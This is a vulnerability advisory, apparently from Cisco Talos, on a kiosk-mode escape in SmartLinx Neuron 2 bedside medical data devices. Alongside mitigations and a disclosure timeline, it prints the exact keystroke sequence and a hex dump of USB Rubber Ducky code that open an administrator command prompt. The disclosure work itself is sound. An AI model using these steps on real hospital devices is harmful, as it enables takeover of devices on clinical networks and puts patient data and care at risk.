A restricted environment escape vulnerability exists in the “kiosk mode” function of Capsule Technologies SmartLinx Neuron 2 medical information collection devices running version 6.9.1. A specific series of keyboard inputs can escape the restricted environment, resulting in full administrator access to the underlying operating system. An attacker can connect to the device via USB port with a keyboard or other HID device to trigger this vulnerability.
Capsule Technologies SmartLinx Neuron 2 6.9.1
Testing was conducted on a legacy version of the software which is no longer supported by Capsule Technologies. However, Talos is aware that the vulnerable version is being used in hospital environments and is therefore releasing this advisory.
7.6 - CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-693: Protection Mechanism Failure
The Capsule Technologies SmartLinx Neuron 2 is a “bedside mobile clinical computer that enables the automatic collection of vital signs data. It features local data storage, and connects to the hospital network” and “is the core hardware component of Capsule™ medical device information system, according to the manufacturer.
The devices feature a restricted environment, commonly referred to as “kiosk mode,” to prevent a user from exiting the running applications and accessing the underlying operating system. It is possible to connect a USB keyboard or other HID device and, through a series of specific keystrokes, escape this restricted environment and access the Microsoft Windows operating system with full administrator permissions. This access could provide an attacker with full control of a trusted device on a hospital’s internal network.
Connect a USB keyboard to the device. Entering the following keystrokes will escape the restricted environment and open an operating system command prompt with administrator privileges.
ALT DOWN 6 times ENTER* SHIFT 5 times SHIFT-TAB SPACE SHIFT-TAB SPACE cmd.exe ENTER *may need to perform steps 1-3 two times
Alternatively, programming a USB Rubber Ducky with the following “duck code” will automatically yeild the same results as the above.
00000000: 00ff 00ff 00ff 00ff 00ff 00ff 00ff 00ff ................ 00000010: 00ff 00ff 00ff 00c3 0204 00ff 00ff 00ff ................ 00000020: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q... 00000030: 00ff 00ff 00eb 2800 0204 00ff 00ff 00ff ......(......... 00000040: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q... 00000050: 00ff 00ff 00eb 2800 0204 00ff 00ff 00ff ......(......... 00000060: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q... 00000070: 00ff 00ff 00eb 2800 0202 0202 0202 0202 ......(......... 00000080: 0202 00ff 00ff 00ff 00eb 2b02 2c00 00ff ..........+.,... 00000090: 00ff 00ff 00eb 2b02 2c00 00ff 00ff 00ff ......+.,....... 000000a0: 00eb 0600 1000 0700 2800 ........(.
Apply vendor software updates. The current version (10.1) is reportedly unaffected by the vulnerability as described in this advisory.
Restrict physical access to vulnerable devices and ensure they remain outside of the organization’s security perimeter. Ensure data or communications from said devices are not implicitly trusted by internal systems. If possible, physically disable or obstruct access to USB ports on vulnerable devices. Monitor logs for signs of connections of unauthorized peripherals to vulnerable devices.
2019-02-26 - Vendor Disclosure
2019-02-28 - Vendor tested & confirmed does not reproduce on Version 10.1
2019-04-08 - Public Release
Discovered by Patrick DeSantis of Cisco Talos.